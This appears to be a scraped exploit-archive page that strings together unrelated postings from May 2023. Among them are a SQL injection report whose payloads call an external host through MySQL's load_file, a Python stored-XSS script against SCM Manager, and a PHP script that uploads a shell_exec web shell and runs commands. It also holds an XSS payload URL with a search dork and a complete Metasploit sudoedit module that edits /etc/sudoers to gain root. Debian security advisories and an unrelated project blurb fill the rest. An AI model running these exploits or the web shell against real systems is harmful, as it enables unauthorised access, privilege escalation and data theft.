New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5411-1

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

SCM Manager versions 1.2 through 1.60 suffer from a persistent cross site scripting vulnerability.

    #!/usr/bin/python3# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)# Google Dork: intitle:"SCM Manager" intext:1.60# Date: 05-25-2023# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)# Vendor Homepage: https://scm-manager.org/# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/# Version: 1.2 <= 1.60# Tested on: Debian based# CVE: CVE-2023-33829# Modulesimport requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200:  print("[+] Authentication successfully")else:  print("[-] Failed to authenticate")  sys.exit(1)new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")

SCM Manager 1.60 Cross Site Scripting

Debian Linux Security Advisory 5410-1 - Multiple security issues were discovered in Sofia-SIP, a SIP User-Agent library, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5410-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 24, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sofia-sipCVE ID         : CVE-2022-31001 CVE-2022-31002 CVE-2022-31003 CVE-2022-47516                  CVE-2023-22741Multiple security issues were discovered in Sofia-SIP, a SIP User-Agentlibrary, which could result in denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.12.11+20110422.1-2.1+deb11u1.We recommend that you upgrade your sofia-sip packages.For the detailed security status of sofia-sip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sofia-sipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRt6GUACgkQEMKTtsN8TjbdIg/8DBVsizs1Bi1N65zEHRKfQ4wlq01lNnLMcEECsk/nBd44yZQJL1pudEBiSFmbcF6l4/oeUKvSo5RN1PBe9boVS+tq3ewAUyThZnrywRttFc09Atf3nQyhNaQz3+1SpqW2k6pTwB2+oilRRDITOorOrQM4hgvYxUhmhNmphNTQtEAbZHXYqAb3NaeKTWdKCfEdSthj0t4uOADcpS2XpK4jDR6ymjzPaIoenvYKV6JEVCo0qj1mSh7+K23dmWhV0WoQP2+W0xrZtkDx1SJHPEXfaQ2XXSuBUvyU351XqfWCTxrfBO3h1mlMrkRJmoSdyP9Pikkrm2bBATDjzl0vEpiWWnAtKaglRCJcBpbnIV7c3l2m61kY8osTZrYlKacRROyYUwpK8Q39l5i8shfCa4gbS+eZlQNjkFzTE8gpJDAmJi0FG2YEsN3E1u979AVnMkWMGe5qEYjybVNwl8OOJ/Ksl/sKsHbQ+s3IzSHwPRpSbHRYXIWTkGtJI3KJyyOpmSTdxBKY+YHmqGRhiOON8De+pcIlgn3LrCN92acRtK8vnQstDL+aNCuqUwY7wNiBrj4/JS4V8SuMn6zBeWDfLcbKYf3BLIsskYb6QuqAIssdNYUzCX4v8UTiiy2YuyBY/JDEutSTbn0ygQntur8BGpJiYHat6MffGhsw1knGhimoUkQ==q7se-----END PGP SIGNATURE-----

Debian Security Advisory 5410-1

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

thrsrossi Millhouse-Project 1.414 Shell Upload

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package. The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root privileges. Affected versions are 1.8.0 through 1.9.12.p1. However, this module only works against Ubuntu 22.04 and 22.10. This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04 and 1.9.11p3-1ubuntu1 on Ubuntu 22.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sudoedit Extra Arguments Priv Esc',        'Description' => %q{          This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.          The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided          environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to          append arbitrary entries to the list of files to process. This can lead to privilege escalation.          by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root          privileges.          Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu          22.04 and 22.10.          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and          1.9.11p3-1ubuntu1 on Ubuntu 22.10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Matthieu Barjole', # original PoC, analysis          'Victor Cutillas' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'EDB', '51217' ],          [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],          [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],          [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],          [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],          [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],          [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],          [ 'CVE', '2023-22809' ]        ],        'DisclosureDate' => '2023-01-18',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]),      OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),    ]  end  def timeout    datastore['TIMEOUT']  end  # Simplify pulling the writable directory variable  def base_dir    datastore['WritableDir'].to_s  end  def get_editable_file    if datastore['EDITABLEFILE'].present?      fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])      vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")      return datastore['EDITABLEFILE']    end    # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to    # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\$root\$|\$ALL\$|\$ALL : ALL\$\' | rev | cut -d " " -f 1 | rev')    editable_file = editable_file.strip    if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')      return nil    end    return nil unless file?(editable_file)    editable_file  end  def get_sudo_version_from_sudo    package = cmd_exec('sudo --version')    package = package.split(' ')[2] # Sudo version XXX    begin      Rex::Version.new(package)    rescue ArgumentError      # this happens on systems like debian 8.7.1 which doesn't have sudo      Rex::Version.new(0)    end  end  def check    sys_info = get_sysinfo    # Check the app is installed and the version    if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'      package = cmd_exec('dpkg -l sudo | grep \'^ii\'')      package = package.split(' ')[2] # ii, package name, version, arch      begin        ver_no = Rex::Version.new(package)      rescue ArgumentError        ver_no = get_sudo_version_from_sudo      end    else      ver_no = get_sudo_version_from_sudo    end    # according to CVE listing, but so much backporting...    minimal_version = '1.8.0'    maximum_version = '1.9.12p1'    exploitable = false    # backporting... so annoying.    # https://ubuntu.com/security/CVE-2023-22809    if sys_info[:distro] == 'ubuntu'      if sys_info[:version].include? '22.10' # kinetic        exploitable = true        maximum_version = '1.9.11p3-1ubuntu1.1'      elsif sys_info[:version].include? '22.04' # jammy        exploitable = true        maximum_version = '1.9.9-1ubuntu2.2'      elsif sys_info[:version].include? '20.04' # focal        maximum_version = '1.8.31-1ubuntu1.4'      elsif sys_info[:version].include? '18.04' # bionic        maximum_version = '1.8.21p2-3ubuntu1.5'      elsif sys_info[:version].include? '16.04'  # xenial        maximum_version = '1.8.16-0ubuntu1.10+esm1'      elsif sys_info[:version].include? '14.04'  # trusty        maximum_version = '1.8.9p5-1ubuntu1.5+esm7'      end    end    if ver_no == Rex::Version.new(0)      return Exploit::CheckCode::Unknown('Unable to detect sudo version')    end    if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)      vprint_good("sudo version #{ver_no} is vulnerable")      # check if theres an entry in /etc/sudoers that allows us to edit a file      editable_file = get_editable_file      if editable_file.nil?        if exploitable          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")        else          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")        end      elsif exploitable        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")      else        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")      end    end    CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    if get_editable_file.nil?      fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'    end    # Make sure we can write our exploit and payload to the local system    unless writable?(base_dir) && directory?(base_dir)      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    sys_info = get_sysinfo    # Check the app is installed and the version    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')    # Upload payload executable    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    upload_and_chmodx payload_path, generate_payload_exe    register_file_for_cleanup(payload_path)    @flag = Rex::Text.rand_text_alphanumeric(12)    print_status 'Adding user to sudoers'    # we tack on a flag so we can easily grep for this line and clean it up later    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"    vprint_status("Executing command: #{command}")    output = cmd_exec command, nil, timeout    if output.include? '/etc/sudoers unchanged'      fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')    end    if output.include? 'sudo: ignoring editor'      fail_with(Failure::NotVulnerable, 'sudo is patched')    end    output.each_line { |line| vprint_status line.chomp }    print_status('Spawning payload')    # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell    # also, attempting to thread off of sudo was problematic, solution was    # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh    # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t    output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout    output.each_line { |line| vprint_status line.chomp }  end  def on_new_session(session)    if @flag      session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")      flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")      if flag_found.include? @flag        print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")      end    end    super  endend

Sudoedit Extra Arguments Privilege Escalation

Debian Linux Security Advisory 5409-1 - Two security issues have been discovered in libssh, a tiny C SSH library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5409-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
May 23, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libssh  
CVE ID         : CVE-2023-1667 CVE-2023-2283  
Debian Bug     : 1035832

Two security issues have been discovered in libssh, a tiny C SSH library:

CVE-2023-1667

    Philip Turnbull discovered a NULL pointer dereference which could  
    result in denial of service.

CVE-2023-2283

    Kevin Backhouse discovered that pki_verify_data_signature() may  
    fail to correctly validate authentication in memory pressure  
    situations.

For the stable distribution (bullseye), these problems have been fixed in  
version 0.9.7-0+deb11u1.

We recommend that you upgrade your libssh packages.

For the detailed security status of libssh please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRsiBoACgkQEMKTtsN8  
TjZY5w/+NUF6BrqMQqHEnFB+pTko58be+U3Au0EvRndBWoOdYIYAMC1upQWMAh0W  
aApXarK7PqaBmBRIWMHHFCY+VsRvriDWQcGReJyw91CuB6cgwLJ3pZ3BP2G4bOTR  
w+7YjOdXuim/nq9cTm45MtIIhUw0zwxJ1rejN5T3bb1ZeeoKTyxxHFy5M548YRg2  
xR4h3C7N6FjegGU3tY2EjWVYWLhvlNLFRlWzoW1XJRoJz91Sv/UDVkoluD71NGAV  
LmopIixYG7WN1DPj0NxDTFg6S2ecg2iSx7kIwf5TvIqdm73US0x6CAzR5ie06MXE  
53V/PpRKhOuK+8qv0XeI4uWVv7irZ2BcNk+e474IH4i2Gjsubzd8m4ddGY7lhj12  
X2FnBO3OQgqWF0Ckn87h6a2O89cC+gCI8n9u4ROcT5iWKpD/2JtauNHi3S0XWyqr  
Tfv7r74fHNqJBa2D3VE8ZlmM6UXfTjVrn631wyX7c/WdqxM65J5fhQocwEWaAnRh  
Of8RWu0E/E4D5PKHctKg45lxTAW6X9DIPeaahjM+VvBaH6K6ugJ1J/3XKakryvyk  
9VA0K6V2zu2EOaqJtj/IsxIZvHf8bCYoqpdPNHEab9xnzR9ChJjX+YLXZY2oF2sw  
t3lEhz4xFxS1sWCCQvriFeSmeiqadCmkFv7t4t58YdmNmfvezvg=P0gj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5409-1

GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field.

**What's all this, then?!**

Silicon Notes: A somewhat lightweight, low-friction personal knowledge base.

Features:

*   Plaintext editing in Markdown, rendering in HTML
*   Language syntax highlighting in rendered HTML
*   Bi-directional page relationships
*   Powerful full-text and page title search
*   Page history
*   A table of contents in the left sidebar, where it belongs
*   A quite-usable mobile layout
*   Built-in documentation
*   No-frills UI
*   No big frameworks, just a few smallish dependencies

For the rationale on why this was created and paper-thin justifications on certain design decisions, see this blog article.

  **Tech Stack**

Projects we rely on and appreciate!

*   Python, of course.
